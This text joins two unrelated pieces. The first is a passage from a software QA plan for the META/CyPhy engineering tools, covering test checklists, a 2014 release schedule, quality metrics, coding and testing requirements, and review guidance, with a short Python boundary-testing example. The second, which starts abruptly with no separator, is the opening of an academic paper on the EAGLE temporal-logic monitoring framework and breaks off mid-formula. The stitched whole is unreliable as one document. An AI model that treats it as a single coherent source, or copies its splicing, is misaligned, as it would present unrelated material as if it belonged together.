Beta testers will begin the testing process by downloading and installing the tools, reading through the tool documentation, and using the instructions on the VehicleFORGE task for specific testing instructions. Testers will submit feedback tickets for both specific issues with the task at hand and general suggestions. There are several different types of feedback tickets.

**5.19.5 Gamma Test**

Gamma testing follows a similar flow to Beta, except the users are much less familiar with the META approach. More effort is expended in ensuring minimal defects are released, and a broader community is involved in deciding both what should be fixed and what should be released [and when]. There are checklists for release readiness, release agreement, and certifications that both tools and Test Benches function properly. The two forms shown in Figure 9 and Figure 10 were used in the Gamma Release process.

### Core CyPhy Tools Test Checklist

<table> <thead> <tr> <th>Functions Properly</th> <th>Tool</th> </tr> </thead> <tbody> <tr> <td></td> <td>Component Importer</td> </tr> <tr> <td></td> <td>Meta-Link</td> </tr> <tr> <td></td> <td>Component Authoring Tool</td> </tr> <tr> <td></td> <td>CLM Light</td> </tr> <tr> <td></td> <td>DESERT</td> </tr> <tr> <td></td> <td>Master Interpreter</td> </tr> <tr> <td></td> <td>PCC</td> </tr> <tr> <td></td> <td>Project Analyzer</td> </tr> </tbody> </table>

**Figure 9: Core CyPhy Tools Test Checklist**

### Core Test Bench Functionality Checklist

<table> <thead> <tr> <th>Scoring</th> <th>Local</th> <th>Remote</th> <th>Test Bench</th> </tr> </thead> <tbody> <tr> <td></td> <td></td> <td></td> <td>Blast</td> </tr> <tr> <td></td> <td></td> <td></td> <td>Ballistics</td> </tr> <tr> <td></td> <td></td> <td></td> <td>Conceptual MFG</td> </tr> <tr> <td></td> <td></td> <td></td> <td>Detailed MFG</td> </tr> <tr> <td></td> <td></td> <td></td> <td>Completeness</td> </tr> <tr> <td></td> <td></td> <td></td> <td>Ergonomics</td> </tr> <tr> <td></td> <td></td> <td></td>
<td>Ingress/Egress</td> </tr> <tr> <td></td> <td></td> <td></td> <td>FOV</td> </tr> <tr> <td></td> <td></td> <td></td> <td>Field of Fire</td> </tr> <tr> <td></td> <td></td> <td></td> <td>Transportability</td> </tr> <tr> <td></td> <td></td> <td></td> <td>Counting</td> </tr> <tr> <td></td> <td></td> <td></td> <td>Dynamics (Surrogate)</td> </tr> </tbody> </table>

**Figure 10: Core Test Bench Functionality Checklist**

5.20 Meta Release Schedule

Meta releases are available for every code change; however, public releases undergo a more involved release process. External public releases follow our 4-week internal development sprints. Below in Figure 11 is the release schedule for 2014.

<table> <thead> <tr> <th>Release Date</th> <th>Progress</th> </tr> </thead> <tbody> <tr> <td>07/Apr/14</td> <td>26 of 26 issues have been resolved</td> </tr> <tr> <td>05/May/14</td> <td>47 of 47 issues have been resolved</td> </tr> <tr> <td>02/Jun/14</td> <td>62 of 62 issues have been resolved</td> </tr> <tr> <td>30/Jun/14</td> <td>48 of 48 issues have been resolved</td> </tr> <tr> <td>28/Jul/14</td> <td>61 of 62 issues have been resolved</td> </tr> <tr> <td>25/Aug/14</td> <td>18 of 18 issues have been resolved</td> </tr> <tr> <td>22/Sep/14</td> <td>No issues.</td> </tr> <tr> <td>20/Oct/14</td> <td>No issues.</td> </tr> </tbody> </table>

Figure 11: 2014 META Release Schedule

5.21 Quality Metrics

Most metrics have been mentioned before, but the following are important to characterize the maturity, complexity, maintainability, and quality of the final software products:

- Total Defects
- Top 10 modules for defects
- Defect Sources
- Failure Interval
- Closure rate
- Time to closure
- Maximum time to closure
- Burndown rate
- Number of defects with closure rates longer than 4 spirals
- Defect Insertion rates
- Time to detect inserted defects
- Complexity Number per module
- Number of modules with Complexity greater than 10.
- Rework size and effort

This section outlines the metrics collected to assess our QA efforts. While the numbers cannot capture the entire process, they are useful points of information. We have prioritized metrics that are lightweight to collect given our tight development schedules.

**Continuous Builds** – Every time a developer commits code to our build server, an automated build and test is triggered. We collect data on the number of successful builds across the team and at the individual developer level.

**Bugs & Bugs fixed** – Our JIRA system tracks and details bugs and other issues. We are able to assess the number of bugs reported, the time required to fix them, and the bugs successfully fixed.

**User feedback** – We have a number of methods of collecting user feedback. The primary method is VehicleFORGE tickets coming from beta testers, FANG competitors, and other users. These tickets can be assessed in terms of quantity, turnaround time, and issue category.

**Successful user threads** – The AVM effort is organized into user threads that make up all actions a FANG user would conduct. This organization method allows us to assess our progress against the overall program and understand where we are being successful.

**Execution of Development Plan** – Our development is organized into four-week sprints with goals outlined and tracked throughout the phase. Following a sprint, we analyze the previous sprint's progress.

6 Appendix

6.1 Coding Documentation Requirements

- A high-level language shall be used except when approved by the SPM.
- Each method, function, and class will be identified with its own comment header. The contents of the header should identify the purpose and any assumptions the user or caller must be aware of.
- Coding documentation will, at a minimum, describe the reasons for code branching and give a description of each variable name at its point of memory allocation.
- Naming conventions shall be used that clearly distinguish literal constants, variables, methods, and class/object names. Class/object names should be nouns; methods should be verbs. Variables shall not be re-used for different purposes, except in trivial cases such as loop counts and indices. In addition, all names will contain at least 2 (two) characters to facilitate global pattern searches.
- Coding complexity conventions for a class shall be established, such as the use of the Cyclomatic Complexity metric. A description of how to calculate the cyclomatic complexity index can be found in Chapter 13 of Software Engineering: A Practitioner's Approach by Roger S. Pressman, McGraw-Hill. The design will not exceed a complexity index value V(g) of 10 without the approval of the SPM.
- Dispatcher logic shall include a default clause, and loops shall include an escape clause except in forever loops.

6.2 Testing Requirements

a. Unit Testing:

Environment: Specify the testing environment, i.e. whether and when stubs, drivers and/or other application routines, special hardware, and/or conditions are to be used.

Logic Complexity: Calculate the cyclomatic complexity index, which specifies the number of test cases required to ensure that all code is executed at least once. A description of how to calculate the cyclomatic complexity index can be found in Chapter 13 of Software Engineering: A Practitioner's Approach by Roger S. Pressman, McGraw-Hill.

Boundary Analysis: Specify tests that will execute code using boundaries at n-1, n, n+1. This includes looping instructions (while, for) and tests that use LT, GT, LE, GE operators.

Error handling: Design tests that verify the recording of all detected and reportable errors that a program is designed to find and report.

Global parameter modification: When a program modifies global variables, design tests that verify the modification.
That is: initialize the variable independently of the program, verify the memory contents, run the program, and check that the memory contents have been modified.

Mathematical Limit Checking: Design tests that use out-of-range values that could cause a mathematical function to calculate erroneous results.

Cessation of Test: Specify the conditions under which a testing session stops and a new build is made. Regression testing is required, according to steps 2 through 6 above, of all lines of code that have been modified.

Documentation: The documentation must provide evidence that the topics in items 2 through 6 above have been addressed.

b. Integration Testing: This type of testing addresses the dual problems of verification and program construction. Integration is a systematic technique for constructing the program structure while at the same time conducting tests to uncover errors associated with interfacing. The objective is to take unit-tested modules and build the program structure dictated by the design. The following topics are addressed in the STP.

Critical Module Definition: Decide which classes/modules contain critical control operations. These classes/modules should be unit tested as soon as possible rather than waiting for subordinate class/object completion. Use of program stubs may be necessary.

Object Grouping: Decide which modules comprise an integration group by using scenarios and the appropriate architecture diagrams. It is desirable to integrate at low levels to make bug isolation easier. Choose objects that are related to a specific function, such as command uplink.

Depth vs. Breadth Testing: Decide how to test a group of objects/classes. It is suggested that breadth testing be used when interfacing with the hardware. Use stubs, if required, to test dispatcher control modules. Use depth testing when a function is well defined and can be demonstrated, e.g. an application mode like timed exposure.
Regression Testing: Integration regression testing is required whenever an interface attribute has been changed, e.g. the value of a passed parameter.

Top Down vs. Bottom Up: Use top-down testing to verify major control or decision points. Use bottom-up testing for hardware-driver-type programs.

c. System Testing: System testing is actually a series of different tests whose primary purpose is to fully exercise the computer-based system. Each test may have a different purpose, but all work to expose system limitations. System testing will follow formal test procedures based on hardware, software and science requirements as specified in the STP.

d. Validation Testing: The purpose of validation is to prove that the META software performs as specified in the User Threads. Validation tests/procedures will identify a testing method and pass/fail criteria. When ranges are specified in the requirements, test cases will include boundary values at $n-1$, $n$, $n+1$ where possible. When LT or GT limits are specified, the measured value should be recorded.

e. Testing Documentation: Testing documentation must be sufficient to provide evidence that the testing objectives stated in the preceding sections and the STP have been met.

6.3 Inspection and Code Review Guidance

Time required: About 200 LoC can be scheduled for review in an hour. Reviews should be no more than 90 minutes long.

Location: Free of distraction, environmentally comfortable, with support for several laptops and a projector [with screen or appropriate flat surface].

Planning for each review session should include access to user threads, code, test cases, Test Benches, and the results of the Test Benches. All previous bugs and JIRA tickets for that module should also be available. The principal engineer should provide informal notes on the changes and their expected impacts, defects, design choices, etc.
Reviewers should include a chair with an overall view of the META program, a domain specialist, a language lawyer, and one other technical contributor in addition to the principal engineer. The chair and principal engineer document the actions, changes, defects, downstream issues, and expected results within 24 hours of the review session. Within two weeks, a subset of the review team meets to verify the closure of action items, defect removal and analysis, and Test Bench results.

Attachment 4: Defect Types

As a minimum, the following defect types should be covered:
- Documentation
- Syntax
- Build, package
- Assignment
- Interface
- Checking
- Data
- Function
- System
- Environment

6.4 Sample Checklist
- Language
- All functions are complete
- “Includes” are complete
- Check variable and parameter initialization
- At program initialization
- At start of every loop
- At entries
- Calls [Pointers, Parameters, use of &]
- Names [Consistent, within declared scope, use of “.” for structure/class refs.]
- Strings [Identified by pointers, terminated in NULL.]
- Pointers [Initialized NULL, only deleted after new, always deleted after use if new.]
- Output format [line stepping proper, spacing proper]
- Ensure {} are proper and matched
- Logic operators [proper use, proper ()]
- Line checks [syntax, punctuation]
- Standards compliance?
- File open and close [properly declared, opened, closed]
- Meaningful error messages
- Consistent style
- Clean style
- Computation considerations
- Unused code
- Security issues
- Adequacy of comments
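The boundary-analysis guidance in Section 6.2 (exercise comparisons at n-1, n, and n+1) is mechanical enough to automate in a unit test. A minimal sketch, where `boundary_values` and the unit under test `within_limit` are illustrative names, not part of this plan:

```python
def boundary_values(n):
    """Boundary-analysis inputs for a limit n: just below, at, just above."""
    return [n - 1, n, n + 1]

def within_limit(x, limit=10):
    """Hypothetical unit under test: an LT comparison against a limit."""
    return x < limit

# Exercise the LT operator at every boundary value of the limit.
results = {x: within_limit(x) for x in boundary_values(10)}
assert results == {9: True, 10: False, 11: False}
```

The same three-value pattern applies to loop bounds and to the GT, LE and GE operators.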
Program Monitoring with LTL in EAGLE

Howard Barringer*
University of Manchester, England

Allen Goldberg, Klaus Havelund
Kestrel Technology, NASA Ames Research Center, USA

Koushik Sen†
University of Illinois at Urbana-Champaign, USA

Abstract

We briefly present a rule-based framework, called EAGLE, shown to be capable of defining and implementing finite-trace monitoring logics, including future- and past-time temporal logic, extended regular expressions, real-time and metric temporal logics (MTL), interval logics, forms of quantified temporal logics, and so on. In this paper we focus on a linear temporal logic (LTL) specialisation of EAGLE. For an initial formula of size $m$, we establish upper bounds of $O(m^2 2^m \log m)$ and $O(m^4 2^{2m} \log^2 m)$ for the space and time complexity, respectively, of a single step of evaluation over an input trace. This is close to the lower bound of $2^{\Omega(\sqrt{m})}$ for future-time LTL presented in [18]. EAGLE has been successfully used, in both LTL and metric-LTL forms, to test a real-time controller of an experimental NASA planetary rover.

1. Introduction

Linear temporal logic (LTL) [17] is now widely used for expressing properties of concurrent and reactive systems. Associated production-quality verification tools have been developed, most notably based on model-checking technology, and have enjoyed much success when applied to relatively small-scale models. Tremendous advances have been made in combating the combinatorial state-space explosion inherent in data and concurrency in model checking; however, serious limitations remain for its application to full-scale models and to software. This has encouraged a shift in the way model-checking techniques are applied: from full state-space coverage to bounded use for sophisticated testing or debugging, and from static application to dynamic, or runtime, application. Our work on EAGLE concerns this latter direction.
*This author is most grateful to RIACS/USRA and to the UK's EPSRC under grant GR/S40435/01 for the partial support provided to conduct this research.
†This author is grateful for the support received from RIACS to undertake this research while participating in the Summer Student Research Program at the NASA Ames Research Center.

The paper is structured as follows. Section 2 introduces our logic framework EAGLE and then specialises it to LTL. In Section 3 we discuss the monitoring algorithm and calculus with an illustrative example. This underlies our implementation for the special case of LTL, which is briefly described in Section 4, where complexity bounds for the implementation can also be found. Section 5 describes an experiment performed using EAGLE, and shows how cyclic deadlock potentials can be detected with EAGLE. Section 6 states conclusions and future work.

2 EAGLE and Linear Temporal Logic

EAGLE [5] offers a succinct but powerful set of primitives, essentially supporting recursive parameterised equations, with a minimal/maximal fixpoint semantics, together with three temporal operators: next-time, previous-time, and concatenation. The parameterisation of rules supports reasoning about data values as well as the embedding of real-time, metric and statistical temporal logics. In Section 2.1 we motivate the fundamental concepts of EAGLE through some simple examples drawn from LTL before presenting its formal definition. Then, in Section 2.2 we present a full embedding of LTL in EAGLE and establish its correctness.

2.1 Introducing EAGLE

2.1.1 Fundamental Concepts

In most temporal logics, the formulas $\Box F$ and $\Diamond F$ satisfy the following equivalences:

\[ \Box F \equiv F \land \bigcirc(\Box F) \qquad\qquad \Diamond F \equiv F \lor \bigcirc(\Diamond F) \]

One can show that $\Box F$ is a solution to the recursive equation $X = F \land \bigcirc X$; in fact it is the maximal solution. A fundamental idea in our logic, EAGLE, is to support this kind of recursive definition, and to enable users to define their own temporal combinators in this fashion.
In the current framework one can write the following definitions for the two combinators Always and Sometime:

\[
\begin{align*}
\textbf{max}\ \text{Always}(\text{Form } F) &= F \land \bigcirc \text{Always}(F) \\
\textbf{min}\ \text{Sometime}(\text{Form } F) &= F \lor \bigcirc \text{Sometime}(F)
\end{align*}
\]

First note that these rules are parameterised by an EAGLE formula (of type Form). Thus, given an atomic formula, say $x > 0$, we can, in the context of these two definitions, write EAGLE formulas such as Always($x > 0$) or Always(Sometime($x > 0$)). Secondly, note that the Always operator is defined as maximal; when applied to a formula $F$ it denotes the maximal solution to the equation $X = F \land \bigcirc X$. The Sometime operator, on the other hand, is defined as minimal, and Sometime($F$) represents the minimal solution to the equation $X = F \lor \bigcirc X$. In EAGLE, this difference only becomes important when evaluating formulas at the boundaries of a trace.

EAGLE has been designed specifically as a general-purpose kernel temporal logic for runtime monitoring. So, to complete this very brief introduction to EAGLE, suppose one wished to monitor the following property of a Java program state containing two variables x and y: "whenever we reach a state where $x = k > 0$ for some value $k$, then eventually we will reach a state in which $y == k$". In a linear temporal logic augmented with first-order quantification, we would write $\Box(x > 0 \rightarrow \exists k\,(k = x \land \Diamond(y = k)))$. The parameterisation mechanism of EAGLE admits data as well as formulas as parameters, and we can encode the above as:

\[
\begin{align*}
\textbf{min}\ R(\text{int } k) &= \text{Sometime}(y == k) \\
\textbf{mon}\ M &= \text{Always}(x > 0 \rightarrow R(x))
\end{align*}
\]

The definition starting with keyword mon specifies the EAGLE formula to be monitored. The rule R is parameterised with an integer k; it is instantiated in the monitor M when $x > 0$ and hence captures the value of x at that moment. Rule R replaces the existential quantifier.
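To make the rule definitions concrete, here is a sketch, not part of EAGLE itself, of Always, Sometime and the data-parameterised monitor M evaluated directly over a finite trace; the function names and the encoding of states as dictionaries are ours. Note the maximal/minimal convention at the trace boundary:

```python
def always(pred, trace, i=1):
    """max rule: past the last state (the boundary) it yields True."""
    if i > len(trace):
        return True
    return pred(trace[i - 1]) and always(pred, trace, i + 1)

def sometime(pred, trace, i=1):
    """min rule: at the boundary it yields False."""
    if i > len(trace):
        return False
    return pred(trace[i - 1]) or sometime(pred, trace, i + 1)

def monitor_M(trace):
    """mon M = Always(x > 0 -> R(x)), with R(k) = Sometime(y == k).
    Binding k = s["x"] mirrors how the rule captures the current x."""
    def step(i):
        if i > len(trace):
            return True                      # Always is maximal
        s = trace[i - 1]
        ok = s["x"] <= 0 or sometime(lambda t, k=s["x"]: t["y"] == k, trace, i)
        return ok and step(i + 1)
    return step(1)

good = [{"x": 3, "y": 0}, {"x": 0, "y": 3}]   # y == 3 eventually follows x == 3
bad = [{"x": 3, "y": 0}]                       # the obligation is never met
assert monitor_M(good) and not monitor_M(bad)
```

This direct recursion re-traverses the trace and is only meant to illustrate the semantics; the actual EAGLE algorithm, described later, evaluates step by step without storing the trace.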
EAGLE also provides a previous-time operator, which allows the definition of past-time operators, and a concatenation operator, which allows users to define interval-based logics, and more. Data parameterisation works uniformly for rules over the past as well as the future; this is non-trivial to achieve since the implementation does not store the trace, see [5].

2.1.2 EAGLE Syntax

A specification $S$ comprises a declaration part $D$ and an observer part $O$. $D$ comprises zero or more rule definitions $R$, and $O$ comprises zero or more monitor definitions $M$, which specify what is to be monitored. Rules and monitors are named ($N$).

\[
\begin{align*}
S &::= D\ O \\
D &::= R^* \\
O &::= M^* \\
R &::= \{\textbf{max} \mid \textbf{min}\}\ N(T_1\ x_1, \ldots, T_n\ x_n) = F \\
M &::= \textbf{mon}\ N = F \\
T &::= \text{Form} \mid \text{primitive type} \\
F &::= \mathit{exp} \mid \text{true} \mid \text{false} \mid \neg F \mid F_1 \land F_2 \mid F_1 \lor F_2 \mid F_1 \rightarrow F_2 \mid \bigcirc F \mid \odot F \mid F_1 \cdot F_2 \mid N(F_1, \ldots, F_n) \mid x_i
\end{align*}
\]

A rule definition $R$ is preceded by a keyword indicating whether its interpretation is maximal or minimal. Parameters are typed, and can either be a formula of type Form, or of a primitive type, such as int, long, float, etc. The body of a rule/monitor is a boolean-valued formula of the syntactic category Form. However, a monitor cannot have a recursive definition; that is, a monitor defined as mon N = F cannot use N in F. For rules we place no such restriction. The propositions of this logic are boolean expressions over an observer state. Formulas are composed using the standard propositional connectives together with a next-state operator ($\bigcirc F$), a previous-state operator ($\odot F$), and a concatenation operator ($F_1 \cdot F_2$). Finally, rules can be applied, and their arguments must be type correct; formula arguments can be any formula, with the restriction that if an argument is an expression, it must be of boolean type.
2.1.3 EAGLE Semantics

The semantics of the logic is defined in terms of a satisfaction relation, $\models$, between execution traces and specifications. We assume that an execution trace $\sigma$ is a finite sequence of program states $\sigma = s_1 s_2 \ldots s_n$, where $|\sigma| = n$ is the length of the trace. The $i$'th state $s_i$ of a trace $\sigma$ is denoted by $\sigma(i)$. The term $\sigma[i \ldots j]$ denotes the sub-trace of $\sigma$ from position $i$ to position $j$, both positions included. Given a trace $\sigma$ and a specification $D\ O$, we define:

\[ \sigma \models D\ O \quad \text{iff} \quad \forall\, (\textbf{mon}\ N = F) \in O.\ \ \sigma, 1 \models_D F \]

That is, a trace satisfies a specification if the trace, observed from position 1 (the first state), satisfies each monitored formula. The definition of the satisfaction relation $\models_D\ \subseteq (\mathit{Trace} \times \mathbb{N}) \times \text{Form}$, for a set of rule definitions $D$, is presented below, where $0 \leq i \leq n+1$ for some trace $\sigma = s_1 s_2 \ldots s_n$. Note that the position of a trace can become 0 (before the first state) when going backwards, and can become $n+1$ (after the last state) when going forwards; in both cases rule applications evaluate to true if maximal and false if minimal, without considering the body of the rules at that point.
\[
\begin{align*}
\sigma, i &\models_D \mathit{exp} && \text{iff}\quad 1 \leq i \leq |\sigma| \text{ and } \mathit{eval}(\mathit{exp})(\sigma(i)) == \text{true} \\
\sigma, i &\models_D \text{true} \\
\sigma, i &\not\models_D \text{false} \\
\sigma, i &\models_D \neg F && \text{iff}\quad \sigma, i \not\models_D F \\
\sigma, i &\models_D F_1 \land F_2 && \text{iff}\quad \sigma, i \models_D F_1 \text{ and } \sigma, i \models_D F_2 \\
\sigma, i &\models_D F_1 \lor F_2 && \text{iff}\quad \sigma, i \models_D F_1 \text{ or } \sigma, i \models_D F_2 \\
\sigma, i &\models_D F_1 \rightarrow F_2 && \text{iff}\quad \sigma, i \models_D F_1 \text{ implies } \sigma, i \models_D F_2 \\
\sigma, i &\models_D \bigcirc F && \text{iff}\quad i \leq |\sigma| \text{ and } \sigma, i+1 \models_D F \\
\sigma, i &\models_D \odot F && \text{iff}\quad 1 \leq i \text{ and } \sigma, i-1 \models_D F \\
\sigma, i &\models_D F_1 \cdot F_2 && \text{iff}\quad \exists\, j,\ i \leq j \leq |\sigma|+1,\ \text{such that } \sigma[1 \ldots j-1], i \models_D F_1 \text{ and } \sigma[j \ldots |\sigma|], 1 \models_D F_2 \\
\sigma, i &\models_D N(F_1, \ldots, F_m) && \text{iff}\quad \text{if } 1 \leq i \leq |\sigma| \text{ then:} \\
&&& \qquad \sigma, i \models_D F[x_1 \mapsto F_1, \ldots, x_m \mapsto F_m] \\
&&& \qquad \text{where } (N(T_1\ x_1, \ldots, T_m\ x_m) = F) \in D \\
&&& \quad \text{otherwise, if } i = 0 \text{ or } i = |\sigma|+1 \text{ then:} \\
&&& \qquad \text{rule } N \text{ is defined as } \textbf{max} \text{ in } D
\end{align*}
\]

An atomic formula ($\mathit{exp}$) is evaluated in the current state $i$ when the position is within the trace, $1 \leq i \leq n$; in the boundary cases ($i = 0$ and $i = n+1$) it evaluates to false. Propositional connectives have their usual semantics at all positions. A next-time formula $\bigcirc F$ evaluates to true if the current position is not beyond the last state and $F$ holds in the next position; dually for the previous-time formula.
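The satisfaction relation above transcribes almost literally into a recursive checker. The following sketch (the tuple encoding of formulas and the function name are ours, not EAGLE's) covers the propositional cases plus next and previous, including the out-of-trace boundary positions 0 and n+1:

```python
def sat(trace, i, f):
    """f: ("atom", pred) | ("not", g) | ("and", g, h) | ("or", g, h)
         | ("next", g) | ("prev", g).  Positions are 1-based."""
    n = len(trace)
    kind = f[0]
    if kind == "atom":                    # false at boundary positions 0 and n+1
        return 1 <= i <= n and f[1](trace[i - 1])
    if kind == "not":
        return not sat(trace, i, f[1])
    if kind == "and":
        return sat(trace, i, f[1]) and sat(trace, i, f[2])
    if kind == "or":
        return sat(trace, i, f[1]) or sat(trace, i, f[2])
    if kind == "next":                    # requires i <= n, then F at i+1
        return i <= n and sat(trace, i + 1, f[1])
    if kind == "prev":                    # requires 1 <= i, then F at i-1
        return 1 <= i and sat(trace, i - 1, f[1])
    raise ValueError(kind)

trace = [1, 2, 3]
pos = ("atom", lambda s: s > 0)
assert sat(trace, 1, ("next", pos))       # state 2 is positive
assert not sat(trace, 3, ("next", pos))   # position 4 is past the boundary
assert not sat(trace, 1, ("prev", pos))   # position 0 is before the boundary
```

Rule application and concatenation are omitted; they would unfold the rule body and try every split point $j$, respectively.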
The concatenation formula $F_1 \cdot F_2$ is true if the trace $\sigma$ can be split into two sub-traces $\sigma = \sigma_1 \sigma_2$, such that $F_1$ is true on $\sigma_1$, observed from the current position $i$, and $F_2$ is true on $\sigma_2$ from its first position (ignoring $\sigma_1$, and thereby limiting the scope of past-time operators). Applying a rule within the trace (positions $1 \ldots n$) consists of replacing the call with the right-hand side of its definition, substituting arguments for formal parameters. At the boundaries (0 and $n+1$) a rule application evaluates to true if and only if the rule is maximal.

2.2 Linear Temporal Logic in EAGLE

We have briefly seen how in EAGLE one can define rules for the $\Box$ and $\Diamond$ temporal operators of LTL. Here we complete an embedding of propositional LTL in EAGLE and prove its semantic correspondence. Figure 1 gives the semantic definition of the since and until LTL temporal operators over finite traces; the definitions of $\Box$ and $\Diamond$, and of the propositional connectives, are as for EAGLE. We assume the usual collection of future- and past-time linear temporal operators.
\[
\begin{align*}
\sigma, i &\models F_1\,\mathcal{U}\,F_2 && \text{iff}\quad 1 \leq i \leq |\sigma| \text{ and } \exists\, i_2,\ i \leq i_2 \leq |\sigma|, \text{ such that } \sigma, i_2 \models F_2 \text{ and} \\
&&&\qquad \forall\, i_1,\ i \leq i_1 < i_2 \text{ implies } \sigma, i_1 \models F_1 \\
\sigma, i &\models F_1\,\mathcal{S}\,F_2 && \text{iff}\quad 1 \leq i \leq |\sigma| \text{ and } \exists\, i_2,\ 1 \leq i_2 \leq i, \text{ such that } \sigma, i_2 \models F_2 \text{ and} \\
&&&\qquad \forall\, i_1,\ i_2 < i_1 \leq i \text{ implies } \sigma, i_1 \models F_1
\end{align*}
\]

with definitions:

\[
\begin{align*}
\Diamond F &\equiv \text{true}\,\mathcal{U}\,F &
\blacklozenge F &\equiv \text{true}\,\mathcal{S}\,F \\
\Box F &\equiv \neg\Diamond\neg F &
\blacksquare F &\equiv \neg\blacklozenge\neg F \\
F_1\,\mathcal{W}\,F_2 &\equiv (F_1\,\mathcal{U}\,F_2) \lor \Box F_1 &
F_1\,\mathcal{Z}\,F_2 &\equiv (F_1\,\mathcal{S}\,F_2) \lor \blacksquare F_1
\end{align*}
\]

Figure 1. Semantic definitions for LTL ($\blacklozenge$ and $\blacksquare$ are the past-time counterparts of $\Diamond$ and $\Box$; $\mathcal{W}$ is unless, i.e. weak until, and $\mathcal{Z}$ is its past-time analogue)

For each temporal operator, future and past, we define a corresponding EAGLE rule. The embedding is straightforward and requires little explanation.
The future-time operators give rise to the following set of rules:

\[
\begin{align*}
\textbf{min}\ \text{Next}(\text{Form } F) &= \bigcirc F \\
\textbf{max}\ \text{Always}(\text{Form } F) &= F \land \bigcirc \text{Always}(F) \\
\textbf{min}\ \text{Sometime}(\text{Form } F) &= F \lor \bigcirc \text{Sometime}(F) \\
\textbf{min}\ \text{Until}(\text{Form } F_1, \text{Form } F_2) &= F_2 \lor (F_1 \land \bigcirc \text{Until}(F_1, F_2)) \\
\textbf{max}\ \text{Unless}(\text{Form } F_1, \text{Form } F_2) &= F_2 \lor (F_1 \land \bigcirc \text{Unless}(F_1, F_2))
\end{align*}
\]

The past-time operators of LTL give rise to the following rules:

\[
\begin{align*}
\textbf{min}\ \text{Previous}(\text{Form } F) &= \odot F \\
\textbf{max}\ \text{AlwaysPast}(\text{Form } F) &= F \land \odot \text{AlwaysPast}(F) \\
\textbf{min}\ \text{SometimePast}(\text{Form } F) &= F \lor \odot \text{SometimePast}(F) \\
\textbf{min}\ \text{Since}(\text{Form } F_1, \text{Form } F_2) &= F_2 \lor (F_1 \land \odot \text{Since}(F_1, F_2)) \\
\textbf{max}\ \text{Zince}(\text{Form } F_1, \text{Form } F_2) &= F_2 \lor (F_1 \land \odot \text{Zince}(F_1, F_2))
\end{align*}
\]

An EAGLE context containing all of the above rules then enables any propositional LTL monitoring formula to be expressed as a monitoring formula in EAGLE by mapping the LTL operators to their EAGLE counterparts. Note that by simply combining the definitions for the future- and past-time LTLs defined above, we obtain a temporal logic over the future, present and past, in which one can freely intermix the future- and past-time modalities.

Correctness of Embedding: To justify the above EAGLE definitions of the LTL temporal operators, we can define an embedding function Embed. Consider the future-time operators. The definitions of eval, value and update are given in Figure 2.
The role of the function update is to pre-evaluate a formula if it is guarded by a previous operator. Formally, update has the property that $\sigma, i \models \mathit{update}(F, s)$ if and only if $\sigma, i+1 \models \mathit{eval}(F, s)$. Had there been no past-time modality in EAGLE, we could have ignored update and simply written $\mathit{eval}(\bigcirc F, s) = F$. The value of a formula $F$ at the end of a trace is given by $\mathit{value}(F)$. The functions are defined as follows.

\[
\begin{align*}
\mathit{eval}(\text{true}, s) &= \text{true} \\
\mathit{eval}(\text{false}, s) &= \text{false} \\
\mathit{eval}(\mathit{exp}, s) &= \text{the value of } \mathit{exp} \text{ in state } s \\
\mathit{eval}(F_1 \text{ op } F_2, s) &= \mathit{eval}(F_1, s) \text{ op } \mathit{eval}(F_2, s) \\
\mathit{eval}(\neg F, s) &= \neg\,\mathit{eval}(F, s) \\
\mathit{eval}(\bigcirc F, s) &= \mathit{update}(F, s) \\[4pt]
\mathit{value}(\text{true}) &= \text{true} \\
\mathit{value}(\text{false}) &= \text{false} \\
\mathit{value}(\mathit{exp}) &= \text{false} \\
\mathit{value}(F_1 \text{ op } F_2) &= \mathit{value}(F_1) \text{ op } \mathit{value}(F_2) \\
\mathit{value}(\neg F) &= \neg\,\mathit{value}(F) \\[4pt]
\mathit{update}(\text{true}, s) &= \text{true} \\
\mathit{update}(\text{false}, s) &= \text{false} \\
\mathit{update}(\mathit{exp}, s) &= \mathit{exp} \\
\mathit{update}(F_1 \text{ op } F_2, s) &= \mathit{update}(F_1, s) \text{ op } \mathit{update}(F_2, s) \\
\mathit{update}(\neg F, s) &= \neg\,\mathit{update}(F, s) \\
\mathit{update}(\bigcirc F, s) &= \bigcirc\,\mathit{update}(F, s)
\end{align*}
\]

**Figure 2. eval, value and update definitions**

For the rule Always, eval and update are defined as follows.
\[
\begin{align*}
\mathit{eval}(\text{Always}(F), s) &= \mathit{eval}(F \land \bigcirc \text{Always}(F), s) \\
\mathit{update}(\text{Always}(F), s) &= \text{Always}(\mathit{update}(F, s))
\end{align*}
\]

Similarly we can give the calculus for the other future-time LTL operators as follows:

\[
\begin{align*}
\mathit{eval}(\text{Next}(F), s) &= \mathit{eval}(\bigcirc F, s) \\
\mathit{update}(\text{Next}(F), s) &= \text{Next}(\mathit{update}(F, s)) \\
\mathit{eval}(\text{Sometime}(F), s) &= \mathit{eval}(F \lor \bigcirc \text{Sometime}(F), s) \\
\mathit{update}(\text{Sometime}(F), s) &= \text{Sometime}(\mathit{update}(F, s)) \\
\mathit{eval}(\text{Until}(F_1, F_2), s) &= \mathit{eval}(F_2 \lor (F_1 \land \bigcirc \text{Until}(F_1, F_2)), s) \\
\mathit{update}(\text{Until}(F_1, F_2), s) &= \text{Until}(\mathit{update}(F_1, s), \mathit{update}(F_2, s)) \\
\mathit{eval}(\text{Unless}(F_1, F_2), s) &= \mathit{eval}(F_2 \lor (F_1 \land \bigcirc \text{Unless}(F_1, F_2)), s) \\
\mathit{update}(\text{Unless}(F_1, F_2), s) &= \text{Unless}(\mathit{update}(F_1, s), \mathit{update}(F_2, s))
\end{align*}
\]

**Past-Time Operators** The past-time LTL operators are defined by rules containing a $\odot$ operator. In general, if a rule contains a formula $F$ guarded by a previous operator on its right-hand side, then we evaluate $F$ at every event and use the result of this evaluation in the next state. Thus, the result of evaluating $F$ must be stored in some temporary placeholder so that it can be used in the next state. To allocate a placeholder we introduce, for every formula guarded by a previous operator, an extra argument in the rule, and use these arguments in the definitions of eval and update for that rule. Let us illustrate this with the rule

\[ \textbf{max}\ \text{AlwaysPast}(\text{Form } F) = F \land \odot \text{AlwaysPast}(F) \]

For this rule we introduce an auxiliary rule AlwaysPast$'$ that contains an extra argument corresponding to the formula $\odot \text{AlwaysPast}(F)$.
In any LTL formula, we use this primed version of the rule instead of the original rule.

\[
\begin{align*}
\text{AlwaysPast}(F) &= \text{AlwaysPast}'(F, \text{true}) \\
\mathit{eval}(\text{AlwaysPast}'(F, \mathit{past}_1), s) &= \mathit{eval}(F \land \mathit{past}_1, s) \\
